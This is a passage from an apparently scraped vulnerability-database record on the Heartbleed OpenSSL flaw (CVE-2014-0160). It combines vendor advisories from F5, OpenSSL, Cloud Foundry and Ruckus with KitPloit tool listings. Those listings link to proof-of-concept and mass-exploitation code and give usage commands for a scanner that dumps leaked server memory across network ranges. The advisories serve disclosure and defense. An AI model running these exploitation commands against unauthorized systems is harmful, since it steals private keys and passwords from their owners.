Managing BIG-IP product hotfixes (11.x).\n\n**BIG-IP Edge Client fixes** \n\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2, and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to SOL8986: F5 software lifecycle policy.\n\nRecommended action\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * SOL14620: Managing SSL certificates for BIG-IP systems\n * SOL14534: Creating SSL certificates and keys with OpenSSL (11.x) \n\n * SOL13579: Generating new default certificate and key pairs for BIG-IP SSL profiles\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * SOL9114: Creating an SSL device certificate and key pair using OpenSSL\n * SOL7754: Renewing self-signed device certificates\n\n**Important**: After you generate a new device certificate and private key pair, you will need to re-establish device trusts. In addition, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you will need to recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a CMI certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **> **Device Trust** > **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group. \n\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * SOL13649: Creating a device group using the Configuration utility\n * SOL13639: Creating a device group using the Traffic Management Shell\n * SOL13946: Troubleshooting ConfigSync and device service clustering issues (11.x)\n\nThe big3d process \n\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\n**Affected big3d versions**\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n\n * big3d version 11.5.0.1.0.227 for Linux \n\n * big3d version 11.5.1.0.0.110 for Linux \n\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to the following article:\n\n * SOL13703: Overview of big3d version management \n\n\nBIG-IP maintenance and user passwords \n\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * SOL13121: Changing system maintenance account passwords (11.x)\n * BIG-IP TMOS: Concepts guide \n\n\n**Mitigating this vulnerability**\n\nTo mitigate this vulnerability, you should consider the following recommendations: \n\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n \n\n * SOL13163: SSL ciphers supported on BIG-IP platforms (11.x)\n * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n * SOL13187: COMPAT SSL ciphers are no longer included in standard cipher strings\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL. For more information about using iRules to protect the back-end servers, refer to the Supplemental Information section.\n\nSupplemental Information\n\n * [CVE-2014-0160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>)\n * <http://heartbleed.com/> \n \n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * SOL14783: Overview of the Client SSL profile (11.x)\n * SOL12463: Overview of F5 Edge products\n * SOL13757: BIG-IP Edge Client version matrix\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n", "reporter": "f5", "published": "2014-04-08T00:00:00", "title": "SOL15159 - OpenSSL vulnerability CVE-2014-0160", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "BIG-IP ASM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP Edge Clients for Linux\n", "version": "7091.2014.408.", "operator": "le"}, {"name": "BIG-IP Edge Clients for Windows\n", "version": "7090.2014.407.", "operator": "le"}, {"name": "BIG-IP Edge Clients for Linux\n", "version": "7100.2014.408.", "operator": "le"}, {"name": "BIG-IP Edge Clients for Linux\n", "version": "7101.2014.407.", "operator": "le"}, {"name": "BIG-IP Edge Clients for Windows\n", "version": "7100.2014.408.", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP Edge Clients for MAC OS X\n", "version": "7100.2014.408.", "operator": "le"}, {"name": "BIG-IP Edge Clients for MAC OS X\n", "version": "7101.2014.407.", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.5.1", "operator": "le"}, {"name": "Enterprise Manager", "version": "HF2", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP Edge Clients for Linux\n", "version": "7080.2014.408.", "operator": "le"}, {"name": "BIG-IP Edge Clients for MAC OS X\n", "version": "7080.2014.408.", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP Edge Clients for Windows\n", "version": "7080.2014.408.", "operator": "le"}, {"name": "BIG-IP Edge Clients for Windows\n", "version": "7091.2014.408.", "operator": "le"}, {"name": "BIG-IP Edge Clients for Apple iOS\n", "version": "1.0.6", "operator": "le"}, {"name": "BIG-IP Edge Clients for Windows\n", "version": "7101.2014.407.", "operator": "le"}, {"name": "BIG-IP Edge Clients for MAC OS X\n", "version": "7091.2014.408.", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP Edge Clients for MAC OS X\n", "version": "7090.2014.407.", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP Edge Clients for Apple iOS\n", "version": "2.0.1", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP Edge Clients for Linux\n", "version": "7090.2014.407.", "operator": "le"}], "cvelist": ["CVE-2014-0160"], "modified": "2015-02-16T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html", "id": "SOL15159", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openssl": [{"lastseen": "2016-09-26T17:22:34", "references": [], "edition": 1, "description": "A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64kB of memory to a connected client or server (a.k.a. Heartbleed). This issue did not affect versions of OpenSSL prior to 1.0.1. Reported by Neel Mehta.", "reporter": "OpenSSL", "published": "2014-04-07T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "openssl", "title": "Vulnerability in OpenSSL (CVE-2014-0160)", "bulletinFamily": "software", "affectedSoftware": [{"name": "openssl", "version": "1.0.1c", "operator": "eq"}, {"name": "openssl", "version": "1.0.1b", "operator": "eq"}, {"name": "openssl", "version": "1.0.1a", "operator": "eq"}, {"name": "openssl", "version": "1.0.1d", "operator": "eq"}, {"name": "openssl", "version": "1.0.1", "operator": "eq"}, {"name": "openssl", "version": "1.0.1f", "operator": "eq"}, {"name": "openssl", "version": "1.0.1e", "operator": "eq"}], "cvelist": ["CVE-2014-0160"], "modified": "2014-04-07T00:00:00", "id": "OPENSSL:CVE-2014-0160", "href": "https://www.openssl.org/news/vulnerabilities.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cloudfoundry": [{"lastseen": "2018-09-07T03:26:07", "references": [], "description": "CVE-2014-0160 Heartbleed\n\n# \n\nCritical\n\n# Vendor\n\nOpenSSL.org\n\n# Versions Affected\n\n * 1.0.1 through 1.0.1f\n\n# Description\n\nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\n\n# Affected Pivotal Products and Versions\n\n_Severity is critical unless otherwise noted. \n_\n\n * vFabric Web Server 5.0.x, 5.1.x, 5.2.x, 5.3.x\n * vFabric GemFire Native Client 7.0.0.X, 7.0.1.X\n * Pivotal GemFire Native Client 7.0.2.X\n * Pivotal Command Center 2.0.x, 2.1.x\n * Pivotal App Suite Virtual Appliance 1.0.1.3\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * vFabric Web Server users (all versions) should apply the patch including version 1.0.1g of OpenSSL per the instructions posted here as soon as possible.\n * GemFire Native Client 7.0.X users should immediately upgrade to OpenSSL 1.0.1g or later or recompile their existing OpenSSL 1.0.1 installations with the \u2013DOPENSSL_NO_HEARTBEATS option. See [CVE-2014-0160-GemFire-Native-Client](<http://gemfire.docs.pivotal.io/security/CVE-2014-0160-GemFire-Native-Client.pdf>) for more information.\n * Please see [this doc](<http://docs.pivotal.io/pivotalhd/advisories/CVE-2014-0160-Advisory-PCC.pdf>) for Pivotal Command Center.\n * Pivotal App Suite Virtual Appliance 1.0.1.3 users should upgrade to version 1.0.1.5 as soon as possible.\n\n# Credit\n\nThis bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at Codenomicon and Neel Mehta of Google Security, who first reported it to the OpenSSL team. The Codenomicon team found the Heartbleed bug while improving the SafeGuard feature in Codenomicon\u2019s Defensics security testing tools and reported this bug to the NCSC-FI for vulnerability coordination and reporting to the OpenSSL team.\n\n# References\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>\n * <http://www.openssl.org/news/vulnerabilities.html>\n * <http://www.kb.cert.org/vuls/id/720951>\n * <http://heartbleed.com/>\n * <https://access.redhat.com/site/solutions/781793>\n\n# History\n\n2014-Apr-7: Initial vulnerability report published.\n", "edition": 4, "reporter": "Cloud Foundry", "published": "2014-04-10T00:00:00", "title": "CVE-2014-0160 Heartbleed | Cloud Foundry", "type": "cloudfoundry", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:00:00", "id": "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "href": "https://www.cloudfoundry.org/blog/cve-2014-0160/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "kitploit": [{"lastseen": "2018-10-26T07:32:29", "references": ["https://gist.github.com/RealRancor/10140249", "https://github.com/rapid7/metasploit-framework/pull/3206/files", "https://github.com/titanous/heartbleeder?files=1", "https://pastebin.com/WmxzjkXJ", "https://github.com/FiloSottile/Heartbleed", "https://bitbucket.org/fb1h2s/cve-2014-0160"], "description": "[  ](<https://2.bp.blogspot.com/-Mbb_SUv_D74/U0XpU8smaLI/AAAAAAAACWI/jTkhKsqAzNE/s1600/heartbleed.png>)\n\n \n \n \n\n\n * A checker (site and tool) for CVE-2014-0160: [ https://github.com/FiloSottile/Heartbleed ](<https://github.com/FiloSottile/Heartbleed>)\n * ** ssltest.py ** : Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [ http://pastebin.com/WmxzjkXJ ](<https://pastebin.com/WmxzjkXJ>)\n * ** SSL Server Test ** [ https://www.ssllabs.com/ssltest/index.html ](<https://www.ssllabs.com/ssltest/index.html>)\n * ** Metasploit Module: ** [ https://github.com/rapid7/metasploit-framework/pull/3206/files ](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * ** Nmap NSE script: ** Detects whether a server is vulnerable to the OpenSSL Heartbleed: [ https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse ](<https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse>)\n * ** Nmap NSE script: ** Quick'n'Dirty OpenVAS nasl wrapper for ssl_heartbleed based on ssl_cert_expiry.nas [ https://gist.github.com/RealRancor/10140249 ](<https://gist.github.com/RealRancor/10140249>)\n * ** Heartbleeder: ** Tests your servers for OpenSSL: [ https://github.com/titanous/heartbleeder?files=1 ](<https://github.com/titanous/heartbleeder?files=1>)\n * ** Heartbleed Attack POC and Mass Scanner: ** [ https://bitbucket.org/fb1h2s/cve-2014-0160 ](<https://bitbucket.org/fb1h2s/cve-2014-0160>)\n * ** Heartbleed Honeypot Script: ** [ http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt ](<http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt>)\n", "edition": 11, "reporter": "KitPloit", "published": "2014-04-10T00:55:31", "title": "Collection of Heartbleed Tools (OpenSSL CVE-2014-0160)", "type": "kitploit", "enchantments": {"score": {"modified": "2018-10-26T07:32:29", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:55:31", "toolHref": "http://www.kitploit.com/2014/04/collection-of-heartbleed-tools-openssl.html", "id": "KITPLOIT:8800200070735873517", "href": "http://www.kitploit.com/2014/04/collection-of-heartbleed-tools-openssl.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-26T03:34:25", "references": ["https://github.com/hybridus/heartbleedscanner"], "description": "[  ](<https://4.bp.blogspot.com/-skuQnYDMoeg/VgyaDSePF2I/AAAAAAAAErQ/_PvtuA7Eobc/s1600/Heartbleed_Scanner.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-4_jmIXJOYP4/VgyazZV8McI/AAAAAAAAErY/0zg4jbkRndU/s1600/Heartbleed%2BScanner.png>)\n\n \n\n\nHeartbleed Vulnerability Scanner is a multiprotocol (HTTP, IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic exploitation tool written with python. \n\n \n\n\nFor scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory of vulnerable system to check after. \n\n\n \n\n\nHearbleed Vulnerability Scanner can also get targets from a list file. This is useful if you already have a list of systems using SSL services such as HTTPS, POP3S, SMTPS or IMAPS. \n \n \n git clone https://github.com/hybridus/heartbleedscanner.git\n\n \n** Sample usage ** \n \nTo scan your local 192.168.1.0/24 network for heartbleed vulnerability (https/443) and save the leaks into a file: \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -f localscan.txt -r\n\n \nTo scan the same network against SMTP Over SSL/TLS and randomize the IP addresses \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP -r\n\n \nIf you already have a target list which you created by using nmap/zmap \n\n \n \n python heartbleedscan.py -i targetlist.txt\n\n \n** Dependencies ** \n** \n** Before using Heartbleed Vulnerability Scanner, you should install ** python-netaddr ** package. \n \nCentOS or CentOS-like systems : \n\n \n \n yum install python-netaddr\n\n \nUbuntu or Debian-like systems : \n\n \n \n apt-get insall python-netaddr\n\n \n \n\n\n** [ Download Heartbleed Vulnerability Scanner ](<https://github.com/hybridus/heartbleedscanner>) **\n", "edition": 7, "reporter": "KitPloit", "published": "2015-10-01T09:47:01", "title": "Heartbleed Vulnerability Scanner - Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)", "type": "kitploit", "enchantments": {"score": {"modified": "2018-10-26T03:34:25", "vector": "NONE", "value": 2.1}}, "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "modified": "2015-10-01T09:47:01", "toolHref": "https://github.com/hybridus/heartbleedscanner", "id": "KITPLOIT:7942195329946074809", "href": "http://www.kitploit.com/2015/10/heartbleed-vulnerability-scanner.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-26T07:31:49", "references": ["https://github.com/rbsec/sslscan", "https://github.com/openssl/openssl", "https://github.com/rbsec/sslscan/releases", "https://github.com/digineo/sslscan"], "description": "[  ](<https://2.bp.blogspot.com/--GJBN1j_Ojw/WFcdv3p9uVI/AAAAAAAAGsw/kk8HnTh5VRQ4CGEP7LCNnUddk63xt4fRQCLcB/s1600/sslscan.png>)\n\n \nThis is a fork of ioerror's version of sslscan (the original readme of which is included below). Changes are as follows: \n\n\n * Highlight SSLv2 and SSLv3 ciphers in output. \n * Highlight CBC ciphers on SSLv3 (POODLE). \n * Highlight 3DES and RC4 ciphers in output. \n * Highlight PFS+GCM ciphers as good in output. \n * Highlight NULL (0 bit), weak (<40 bit) and medium (40 < n <= 56) ciphers in output. \n * Highlight anonymous (ADH and AECDH) ciphers in output (purple). \n * Hide certificate information by default (display with ` --get-certificate ` ). \n * Hide rejected ciphers by default (display with ` --failed ` ). \n * Added TLSv1.1 and TLSv1.2 support (merged from twwbond/sslscan). \n * Compiles if OpenSSL does not support SSLv2 ciphers (merged from digineo/sslscan). \n * Supports IPv6 hostnames (can be forced with ` --ipv6 ` ). \n * Check for TLS compression (CRIME, disable with ` --no-compression ` ). \n * Disable cipher suite checking ` --no-ciphersuites ` . \n * Disable coloured output ` --no-colour ` . \n * Removed undocumented -p output option. \n * Added check for OpenSSL HeartBleed (CVE-2014-0160, disable with ` --no-heartbleed ` ). \n * Flag certificates signed with MD5 or SHA-1, or with short (<2048 bit) RSA keys. \n * Support scanning RDP servers with ` --rdp ` (credit skettler). \n * Added option to specify socket timeout. \n * Added option for static compilation (credit dmke). \n * Added ` --sleep ` option to pause between requests. \n * Disable output for anything than specified checks ` --no-preferred ` . \n * Determine the list of CAs acceptable for client certificates ` --show-client-cas ` . \n * Experimental build support on OSX (credit MikeSchroll). \n * Flag some self-signed SSL certificates. \n * Experimental Windows support (credit jtesta). \n * Display EC curve names and DHE key lengths with OpenSSL >= 1.0.2 ` --no-cipher-details ` . \n * Flag weak DHE keys with OpenSSL >= 1.0.2 ` --cipher-details ` . \n * Flag expired certificates. \n * Flag TLSv1.0 ciphers in output as weak. \n * Experimental OSX support (static building only). \n * Support for scanning PostgreSQL servers (credit nuxi). \n * Check for TLS Fallback SCSV support. \n * Added StartTLS support for LDAP ` --starttls-ldap ` . \n * Added SNI support ` --sni-name ` (credit Ken). \n \n** Building on Windows ** \nThanks to a patch by jtesta, sslscan can now be compiled on Windows. This can either be done natively or by cross-compiling from Linux. See INSTALL for instructions. \nNote that sslscan was originally written for Linux, and has not been extensively tested on Windows. As such, the Windows version should be considered experimental. \nPre-build cross-compiled Windows binaries are available on the [ GitHub Releases Page ](<https://github.com/rbsec/sslscan/releases>) . \n \n** Building on OS X ** \nThere is experimental support for statically building on OS X, however this should be considered unsupported. You may need to install any dependencies required to compile OpenSSL from source on OS X. Once you have, just run: \n\n \n \n make static\n\n \n** OpenSSL issues ** \n \n** Statically linking a custom OpenSSL build ** \nIt is possible to ignore the OpenSSL system installation and ship your own version. Although this results in a more resource-heavy ` sslscan ` binary (file size, memory consumption, etc.), this allows to enable both SSLv2 and SSLv3 ciphers. In comparison to the method of repackaging the Debian build, this custom OpenSSL build won't affect other tools on the same system, as they would use the version packaged by the distro's maintainers. \nTo compile your own OpenSSL version, you'll probably need to install the OpenSSL build dependencies: \n\n \n \n apt-get install build-essential git zlib1g-dev\n apt-get build-dep openssl\n\nthen run \n\n \n \n make static\n\nwhich will clone the [ OpenSSL repository ](<https://github.com/openssl/openssl>) , and configure/compile/test OpenSSL prior to compiling ` sslscan ` . \n** Please note: ** Out of the box, OpenSSL cannot compiled with ` clang ` without further customization (which is not done by the provided ` Makefile ` ). For more information on this, see [ Modifying Build Settings ](<https://wiki.openssl.org/index.php/Compilation_and_Installation#Modifying_Build_Settings>) in the OpenSSL wiki. \nYou can verify whether you have a statically linked OpenSSL version, if \n\n \n \n ./sslscan --version\n\nlooks a bit like \n\n \n \n 1.x.y-...-static\n OpenSSL 1.1.0-dev xx XXX xxxx\n\n(pay attention to the ` -static ` suffix and the ` 1.1.0-dev ` OpenSSL version). \n \n** Building on Kali ** \nKali now ships with a statically built version of sslscan which supports SSLv2. \nThe package can be found in the [ Kali Git Repository ](<http://git.kali.org/gitweb/?p=packages/sslscan.git;a=summary>) . \nIf for whatever reason you can't install this package, follow the instructions above for statically building against OpenSSL. \n \n** Building on Debian ** \nIt is recommended that you statically build sslscan using the instructions listed above. If this is not an option and you want to compile your system OpenSSL with support for legacy protocols such as SSLv2 and SSLv3 then follow the instructions below. \nNote that many modern distros (including Debian) ship with a version of OpenSSL that disables support for SSLv2 ciphers. If ` sslscan ` is compiled on one of these distros, it will not be able to detect SSLv2. \nThis issue can be resolved by rebuilding OpenSSL from source after removing the patch that disables SSLv2 support. \nThe ` build_openssl_debian.sh ` script automates this process for Debian systems. It has been tested on Debian Squeeze/Wheezy; it may work on other Debian based distros, but has not been tested. The built version of OpenSSL will be installed using ` dpkg ` . \nIf it is not possible to rebuild OpenSSL, ` sslscan ` will still compile (thanks to a patch from [ digineo/sslscan ](<https://github.com/digineo/sslscan>) , based on the debian patch). However, a warning will be displayed in the output to notify the user that SSLv2 ciphers will not be detected. \n \n \n\n\n** [ Download sslscan ](<https://github.com/rbsec/sslscan>) **\n", "edition": 11, "reporter": "KitPloit", "published": "2016-12-26T14:30:12", "title": "sslscan - tests SSL/TLS enabled services to discover supported cipher suites", "type": "kitploit", "enchantments": {"score": {"modified": "2018-10-26T07:31:49", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "tools", "cvelist": ["CVE-2014-0160"], "modified": "2016-12-26T14:30:12", "toolHref": "http://www.kitploit.com/2016/12/sslscan-tests-ssltls-enabled-services.html", "id": "KITPLOIT:8661324951126484733", "href": "http://www.kitploit.com/2016/12/sslscan-tests-ssltls-enabled-services.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nRUCKUS ADVISORY ID 041414\r\n\r\nCustomer release date: April 14, 2014\r\nPublic release date: April 14, 2014\r\n\r\nTITLE\r\n\r\nOpenSSL 1.0.1 library's "Heart bleed" vulnerability - CVE-2014-0160\r\n\r\n\r\nSUMMARY\r\n\r\nOpenSSL library is used in Ruckus products to implement various\r\nsecurity related features. A vulnerability has been discovered in\r\nOpenSSL library which may allow an unauthenticated, remote attacker to\r\nretrieve memory in chunks of 64 kilobytes from a connected client or\r\nserver. An exploit could disclose portions of memory containing\r\nsensitive security material such as passwords and private keys.\r\n\r\n\r\nAFFECTED SOFTWARE VERSIONS AND DEVICES\r\n\r\n\r\n Device Affected software\r\n- --------------------- ------------------\r\nSmart Cell Gateway 1.1.x\r\nSmartCell Access Points NOT AFFECTED\r\nZoneDirector Controllers NOT AFFECTED\r\nZoneFlex Access Points NOT AFFECTED\r\n\r\n\r\nAny products or services not mentioned in the table above are not affected\r\n\r\n\r\nDETAILS\r\n\r\nA vulnerability has been discovered in the popular OpenSSL\r\ncryptographic software library. This weakness exists in OpenSSL's\r\nimplementation of the TLS/DTLS (transport layer security protocols)\r\nheartbeat extension (RFC6520). This vulnerability is due to a missing\r\nbounds check in implementation of the handling of the heartbeat\r\nextension. When exploited, this issue may lead to leak of memory\r\ncontents from the server to the client and from the client to the\r\nserver. These memory contents could contain sensitive security\r\nmaterial such as passwords and private keys.\r\n\r\n\r\nIMPACT\r\n\r\nRuckus devices incorporate OpenSSL library to implement various\r\nsecurity related features. Below is list of the affected components:\r\n\r\n- - Administrative HTTPS Interface (Port 8443)\r\n\r\n\r\nCVSS v2 Base Score:5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\n\r\n\r\n \r\nWORKAROUNDS\r\n\r\nRuckus recommends that all customers apply the appropriate patch(es)\r\nas soon as practical. However, in the event that a patch cannot\r\nimmediately be applied, the following suggestions might help reduce\r\nthe risk:\r\n\r\n - Do not expose administrative interfaces of Ruckus devices to\r\nuntrusted networks such as the Internet.\r\n\r\n - Use a firewall to limit traffic to/from Ruckus device's\r\nadministrative interface to trusted hosts.\r\n\r\n \r\n\r\nSOLUTION\r\n\r\nRuckus recommends that all customers apply the appropriate patch(es)\r\nas soon as practical.\r\n\r\nThe following software builds have the fix (any later builds will also\r\nhave the fix):\r\n\r\n\r\nBranch Software Build\r\n- ------- ------------------\r\n1.1.x 1.1.2.0.142\r\n\r\n\r\n\r\n\r\nDISCOVERY\r\n\r\nThis vulnerability was disclosed online on various sources :\r\n\r\n- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\r\n- - https://www.openssl.org/news/secadv_20140407.txt\r\n- - http://heartbleed.com/\r\n\r\n\r\n\r\n\r\nOBTAINING FIXED FIRMWARE\r\n\r\nRuckus customers can contact Ruckus support to obtain the fixed firmware\r\n\r\nRuckus Support contact list is at:\r\n https://support.ruckuswireless.com/contact-us\r\n\r\n\r\nPUBLIC ANNOUNCEMENTS\r\n\r\nThis security advisory will be made available for public consumption\r\non April 14, 2014 at the following source\r\n\r\nRuckus Website\r\nhttp://www.ruckuswireless.com/security\r\n\r\nSecurityFocus Bugtraq\r\nhttp://www.securityfocus.com/archive/1\r\n\r\n\r\nFuture updates of this advisory, if any, will be placed on Ruckus's\r\nwebsite, but may or may not be actively announced on mailing lists.\r\n\r\nREVISION HISTORY\r\n\r\n Revision 1.0 / 14th April 2014 / Initial release\r\n\r\n\r\nRUCKUS WIRELESS SECURITY PROCEDURES\r\n\r\nComplete information on reporting security vulnerabilities in Ruckus\r\nWireless\r\nproducts, obtaining assistance with security incidents is available at\r\n http://www.ruckuswireless.com/security\r\n \r\n \r\nFor reporting new security issues, email can be sent to\r\nsecurity(at)ruckuswireless.com\r\nFor sensitive information we encourage the use of PGP encryption. Our\r\npublic keys can be\r\nfound at http://www.ruckuswireless.com/security\r\n\r\n \r\nSTATUS OF THIS NOTICE: Final\r\n\r\nAlthough Ruckus cannot guarantee the accuracy of all statements\r\nin this advisory, all of the facts have been checked to the best of our\r\nability. Ruckus does not anticipate issuing updated versions of\r\nthis advisory unless there is some material change in the facts. Should\r\nthere be a significant change in the facts, Ruckus may update this\r\nadvisory.\r\n\r\n\r\n(c) Copyright 2014 by Ruckus Wireless\r\nThis advisory may be redistributed freely after the public release\r\ndate given at\r\nthe top of the text, provided that redistributed copies are complete and\r\nunmodified, including all date and version information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.18 (Darwin)\r\nComment: GPGTools - http://gpgtools.org\r\nComment: Using GnuPG with Mozilla - 